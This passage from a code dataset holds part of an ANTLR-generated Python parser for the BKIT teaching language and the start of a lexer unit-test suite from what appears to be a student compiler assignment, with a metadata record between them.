BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 358\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_OP(self):\n return self.getToken(BKITParser.UN_OP, 0)\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_expr5)\n try:\n self.state = 364\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 361\n self.match(BKITParser.UN_OP)\n self.state = 362\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 363\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def 
index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 62, self.RULE_expr6)\n try:\n self.state = 370\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,32,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 366\n self.expr7()\n self.state = 367\n self.index_op()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 369\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 64, self.RULE_expr7)\n try:\n self.state = 374\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 372\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 373\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, 
parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 66, self.RULE_expr8)\n try:\n self.state = 381\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 376\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 377\n self.match(BKITParser.LEFT_PAREN)\n self.state = 378\n self.expr()\n self.state = 379\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = 
BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_operand)\n try:\n self.state = 386\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 383\n self.var_non_init()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 384\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 385\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 388\n self.match(BKITParser.ID)\n self.state = 389\n self.match(BKITParser.LEFT_PAREN)\n self.state = 
400\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 390\n self.expr()\n self.state = 395\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 391\n self.match(BKITParser.COMMA)\n self.state = 392\n self.expr()\n self.state = 397\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 402\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 403\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_index_op)\n try:\n self.state = 414\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,38,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 405\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 406\n 
self.expr()\n self.state = 407\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 409\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 410\n self.expr()\n self.state = 411\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 412\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[26] = self.expr1_sempred\n self._predicates[27] = self.expr2_sempred\n self._predicates[28] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.5216096043586731, "alphanum_fraction": 0.5578612685203552, "avg_line_length": 28.471725463867188, "blob_id": "8da7e5b7366c05bf56ba29a1478a76109faa9005", "content_id": "3f2bc4bff6561e357782a96db285d4e792e1d477", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19806, "license_type": "no_license", "max_line_length": 102, "num_lines": 672, "path": "/Assignments/assignment1/src/test/LexerSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestLexer\n\nclass LexerSuite(unittest.TestCase):\n \n def 
test_lower_identifier(self):\n \"\"\"test identifiers\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"abc\",\"abc,<EOF>\",101))\n\n def test_lower_upper_id(self):\n self.assertTrue(TestLexer.checkLexeme(\"Var\",\"Var,<EOF>\",102))\n\n def test_wrong_token(self):\n self.assertTrue(TestLexer.checkLexeme(\"ab?svn\",\"ab,ERROR_CHAR ?\",103))\n\n def test_integer(self):\n \"\"\"test integers\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"Var x;\",\"Var,x,;,<EOF>\",104))\n\n def test_illegal_escape(self):\n \"\"\"test illegal escape\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc\\\\h def\" \"\"\",\"\"\"ILLEGAL_ESCAPE abc\\\\h\"\"\",105))\n\n def test_unterminated_string(self):\n \"\"\"test unclosed string\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"abc def \"\"\",\"\"\"UNCLOSE_STRING abc def \"\"\",106))\n\n def test_normal_string_with_escape(self):\n \"\"\"test normal string with escape\"\"\"\n self.assertTrue(TestLexer.checkLexeme(\"\"\" \"ab'\"c\\\\n def\" \"\"\",\"\"\"ab'\"c\\\\n def,<EOF>\"\"\",107))\n \n def test_simple_array(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"{1, 2, 3, 4}\"\"\", \"\"\"{,1,,,2,,,3,,,4,},<EOF>\"\"\", 108))\n\n def test_int(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"0123\"\"\", \"\"\"0,123,<EOF>\"\"\", 109))\n\n def test_unterminated_comment(self):\n self.assertTrue(TestLexer.checkLexeme(\"\"\"**abvc\"\"\", \"\"\"UNTERMINATED_COMMENT\"\"\", 110))\n \n def test_hexa_var_declare(self):\n input=\"\"\"Var x=0x12;\"\"\"\n expect=\"\"\"Var,x,=,0x12,;,<EOF>\"\"\"\n num=111\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_assign_stmt(self):\n input=\"\"\"a=12+3;\"\"\"\n expect=\"\"\"a,=,12,+,3,;,<EOF>\"\"\"\n num=112\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_function_name_declare(self):\n input=\"\"\"Function: main\"\"\"\n expect=\"\"\"Function,:,main,<EOF>\"\"\"\n num=113\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def 
test_dec_hex_same_array(self):\n input=\"\"\"x={{12,0x12}}\"\"\"\n expect=\"\"\"x,=,{,{,12,,,0x12,},},<EOF>\"\"\"\n num=114\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_normal_string(self):\n input=\"\"\"\\\"this is a string\\\"\"\"\"\n expect=\"\"\"this is a string,<EOF>\"\"\"\n num=115\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n def test_unclose_string_without_escape(self):\n input=\"\"\"\\\"this is an unclose_string\"\"\"\n expect=\"\"\"UNCLOSE_STRING this is an unclose_string\"\"\"\n num=116\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_legal_esc(self):\n input=\"\"\"\\\" this is a string contain some legal esc: \\\\',\\\\b,\\\\t\\\"\"\"\"\n expect=\"\"\" this is a string contain some legal esc: \\\\',\\\\b,\\\\t,<EOF>\"\"\"\n num=117\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_illegal_esc(self):\n input=\"\"\"\\\" this is a string with illegal escape \\\\h\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE this is a string with illegal escape \\\\h\"\"\"\n num=118\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_double_quote_in_string(self):\n input=\"\"\"\\\"string with quote '\"can be exp'\"\\\"\"\"\"\n expect=\"\"\"string with quote '\"can be exp'\",<EOF>\"\"\"\n num=119\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_started_float(self):\n input=\"\"\"0e0\"\"\"\n expect=\"\"\"0e0,<EOF>\"\"\"\n num=120\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_started_2_float(self):\n input=\"\"\"01e0\"\"\"\n expect=\"\"\"01e0,<EOF>\"\"\"\n num=121\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_without_right_part(self):\n input=\"\"\"12000.\"\"\"\n expect=\"\"\"12000.,<EOF>\"\"\"\n num=122\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_hexa_capital_num(self):\n input=\"\"\"0xFF\"\"\"\n 
expect=\"\"\"0xFF,<EOF>\"\"\"\n num=123\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_octal_capital(self):\n input=\"\"\"0O456\"\"\"\n expect=\"\"\"0O456,<EOF>\"\"\"\n num=124\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero(self):\n input=\"\"\"0\"\"\"\n expect=\"\"\"0,<EOF>\"\"\"\n num=125\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_started_hexa(self):\n input=\"\"\"0x\"\"\"\n expect=\"\"\"0,x,<EOF>\"\"\"\n num=126\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n \n def test_comment_in_string_esc(self):\n input=\"\"\"\\\"comment in /\\\\'\\\\\\\\string**\\\"\"\"\"\n expect=\"\"\"comment in /\\\\'\\\\\\\\string**,<EOF>\"\"\"\n num=127\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_multi_line_comment(self):\n input=\"\"\"** this\nis a\nmultiline*\ncomment**\"\"\"\n expect=\"\"\"<EOF>\"\"\"\n num=128\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_comment(self):\n input=\"\"\"*****\"\"\"\n expect=\"\"\"*,<EOF>\"\"\"\n num=129\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_not_sametype_array(self):\n input=\"\"\"{\"abc\",12}\"\"\"\n expect=\"\"\"{,abc,,,12,},<EOF>\"\"\"\n num=130\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_empty_string(self):\n input=\"\"\"\\\"\\\"\"\"\"\n expect=\"\"\",<EOF>\"\"\"\n num=131\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n def test_sing_quote_esc(self):\n input=\"\"\"\"str with sing quote\\\\'\\\"\"\"\"\n expect=\"\"\"str with sing quote\\\\',<EOF>\"\"\"\n num=132\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_back_slash_legal(self):\n input=\"\"\"\\\"str with back slash \\\\\\\\ legal\\\"\"\"\"\n expect=\"\"\"str with back slash \\\\\\\\ legal,<EOF>\"\"\"\n num=133\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def 
test_back_slash_illegal(self):\n input=\"\"\"\\\"str with back slash illegal \\\\\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE str with back slash illegal \\\\\\\"\"\"\"\n num=134\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_multi_type_array(self):\n input=\"\"\"{\"abc\",12,12.,True,{12,1e1}}\"\"\"\n expect=\"\"\"{,abc,,,12,,,12.,,,True,,,{,12,,,1e1,},},<EOF>\"\"\"\n num=135\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_simple_expr(self):\n input=\"\"\"a[1]=b+1.0\"\"\"\n expect=\"\"\"a,[,1,],=,b,+,1.0,<EOF>\"\"\"\n num=136\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_complicated_composite_var(self):\n input=\"\"\"a[b[1][3]]\"\"\"\n expect=\"\"\"a,[,b,[,1,],[,3,],],<EOF>\"\"\"\n num=137\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_scientific(self):\n input=\"\"\"1200e-1\"\"\"\n expect=\"\"\"1200e-1,<EOF>\"\"\"\n num=138\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_pos_scientific(self):\n input=\"\"\"122e+1\"\"\"\n expect=\"\"\"122e+1,<EOF>\"\"\"\n num=139\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_while_stmt_test(self):\n input=\"\"\"While (i>1) Do EndWhile.\"\"\"\n expect=\"\"\"While,(,i,>,1,),Do,EndWhile,.,<EOF>\"\"\"\n num=140\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_logical_exp(self):\n input=\"\"\"i && a\"\"\"\n expect=\"\"\"i,&&,a,<EOF>\"\"\"\n num=141\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_relational_exp(self):\n input=\"\"\"i =/= a\"\"\"\n expect=\"\"\"i,=/=,a,<EOF>\"\"\"\n num=142\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_logical_or_exp(self):\n input=\"\"\"i||a\"\"\"\n expect=\"\"\"i,||,a,<EOF>\"\"\"\n num=143\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_logical_not_exp(self):\n input=\"\"\"!a\"\"\"\n expect=\"\"\"!,a,<EOF>\"\"\"\n 
num=144\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_relation_equal_exp(self):\n input=\"\"\"i==a\"\"\"\n expect=\"\"\"i,==,a,<EOF>\"\"\"\n num=145\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_not_equal_exp(self):\n input=\"\"\"i!=a\"\"\"\n expect=\"\"\"i,!=,a,<EOF>\"\"\"\n num=146\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_sing_compare_exp(self):\n input=\"\"\"i>a\"\"\"\n expect=\"\"\"i,>,a,<EOF>\"\"\"\n num=147\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_doub_compare_exp(self):\n input=\"\"\"i>=a\"\"\"\n expect=\"\"\"i,>=,a,<EOF>\"\"\"\n num=148\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_expr_in_index_expr(self):\n input=\"\"\"a[1+foo(a)]\"\"\"\n expect=\"\"\"a,[,1,+,foo,(,a,),],<EOF>\"\"\"\n num=149\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_mul_expr_in_func_call(self):\n input=\"\"\"foo(a < i, a = a+ 1, b[1])\"\"\"\n expect=\"\"\"foo,(,a,<,i,,,a,=,a,+,1,,,b,[,1,],),<EOF>\"\"\"\n num=150\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_mul_expr_in_assign(self):\n input=\"\"\"a = a + foo(10) + b < 2\"\"\"\n expect=\"\"\"a,=,a,+,foo,(,10,),+,b,<,2,<EOF>\"\"\"\n num=151\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_int_to_float_func(self):\n input=\"\"\"int_of_float(1.02)\"\"\"\n expect=\"\"\"int_of_float,(,1.02,),<EOF>\"\"\"\n num=152\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_to_int_func(self):\n input=\"\"\"float_to_int(1.092)\"\"\"\n expect=\"\"\"float_to_int,(,1.092,),<EOF>\"\"\"\n num=153\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_int_of_string_func(self):\n input=\"\"\"int_of_string(\"12\")\"\"\"\n expect=\"\"\"int_of_string,(,12,),<EOF>\"\"\"\n num=154\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def 
test_string_of_int_func(self):\n input=\"\"\"string_of_int(12)\"\"\"\n expect=\"\"\"string_of_int,(,12,),<EOF>\"\"\"\n num=155\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_of_string_func(self):\n input=\"\"\"float_of_string(\"12.45\")\"\"\"\n expect=\"\"\"float_of_string,(,12.45,),<EOF>\"\"\"\n num=156\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_func_call_in_func(self):\n input=\"\"\"int_of_string(read())\"\"\"\n expect=\"\"\"int_of_string,(,read,(,),),<EOF>\"\"\"\n num=157\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_multi_type_args(self):\n input=\"\"\"function(12,\"ab\",foo(a[1]))\"\"\"\n expect=\"\"\"function,(,12,,,ab,,,foo,(,a,[,1,],),),<EOF>\"\"\"\n num=158\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_array_with_blank(self):\n input=\"\"\"array[1] = {1 , \"asd\", 22, a }\"\"\"\n expect=\"\"\"array,[,1,],=,{,1,,,asd,,,22,,,a,},<EOF>\"\"\"\n num=159\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_unterminated_comment_in_string(self):\n input=\"\"\"\\\"string **this is com\\ment\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE string **this is com\\\\m\"\"\"\n num=160\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_illegal_escape_before_comment(self):\n input=\"\"\"\\\"string \\**comment**\\\"\"\"\"\n expect=\"\"\"ILLEGAL_ESCAPE string \\*\"\"\"\n num=161\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_in_expr(self):\n input=\"\"\"{**comment**}\"\"\"\n expect=\"\"\"{,},<EOF>\"\"\"\n num=162\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_arithmetic_op_expr(self):\n input=\"\"\"v = (4 \\. 3.) *. 
3.14 * a;\"\"\"\n expect=\"\"\"v,=,(,4,\\.,3.,),*.,3.14,*,a,;,<EOF>\"\"\"\n num=163\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_in_string(self):\n input=\"\"\"\\\"string **comment**\\\"\"\"\"\n expect=\"\"\"string **comment**,<EOF>\"\"\"\n num=164\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_recursive_func_call(self):\n input=\"\"\"foo(foo(foo(foo(foo(\"abc\")))))\"\"\"\n expect=\"\"\"foo,(,foo,(,foo,(,foo,(,foo,(,abc,),),),),),<EOF>\"\"\"\n num=165\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_id_with_under(self):\n input=\"\"\"a_b\"\"\"\n expect=\"\"\"a_b,<EOF>\"\"\"\n num=166\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_wrong_char_in_id(self):\n input=\"\"\"a$b\"\"\"\n expect=\"\"\"a,ERROR_CHAR $\"\"\"\n num=167\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_all_allow_type_in_id(self):\n input=\"\"\"aB9_\"\"\"\n expect=\"\"\"aB9_,<EOF>\"\"\"\n num=168\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_test_neg_num(self):\n input=\"\"\"-12\"\"\"\n expect=\"\"\"-,12,<EOF>\"\"\"\n num=169\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_khanh_str_test(self):\n input=\"\"\"\\\" asdfasd \\\" adfads\\\"\"\"\"\n expect=\"\"\" asdfasd ,adfads,UNCLOSE_STRING \"\"\"\n num=170\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_newline_illegal(self):\n input=\"\"\"\\\"this is\n\"\"\"\n expect=\"\"\"UNCLOSE_STRING this is\\n\"\"\"\n num=171\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_zero_after_octal_prefix(self):\n input=\"\"\"0o0001\"\"\"\n expect=\"\"\"0,o0001,<EOF>\"\"\"\n num=172\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_octal_error_id_error(self):\n input=\"\"\"0O012\"\"\"\n expect=\"\"\"0,ERROR_CHAR O\"\"\"\n num=173\n self.assertTrue(TestLexer.checkLexeme(input, 
expect, num))\n\n\n def test_err_hex_err_id(self):\n input=\"\"\"0X012\"\"\"\n expect=\"\"\"0,ERROR_CHAR X\"\"\"\n num=174\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_with_illegal_newline(self):\n input=\"\"\"**this\n\\h\n\"shit\"\n**\"\"\"\n expect=\"\"\"<EOF>\"\"\"\n num=175\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_int_lit(self):\n input=\"\"\"-12\"\"\"\n expect=\"\"\"-,12,<EOF>\"\"\"\n num=176\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_hex(self):\n input=\"\"\"-0x12\"\"\"\n expect=\"\"\"-,0x12,<EOF>\"\"\"\n num=177\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_comment_between_lit(self):\n input=\"\"\"-12.**comment**1\"\"\"\n expect=\"\"\"-,12.,1,<EOF>\"\"\"\n num=178\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_normal_float_non_scientific_not(self):\n input=\"\"\"12.1\"\"\"\n expect=\"\"\"12.1,<EOF>\"\"\"\n num=179\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test__zero_after_hex_prefix(self):\n input=\"\"\"0x000\"\"\"\n expect=\"\"\"0,x000,<EOF>\"\"\"\n num=180\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_bool_lit(self):\n input=\"\"\"True False\"\"\"\n expect=\"\"\"True,False,<EOF>\"\"\"\n num=181\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_test_all_legal_esc(self):\n input=\"\"\"\\\"legal \\\\b\\\\t\\\\r\\\\n\\\\f\\\\\\\\\\\\' '\\\"\\\"\"\"\"\n expect=\"\"\"legal 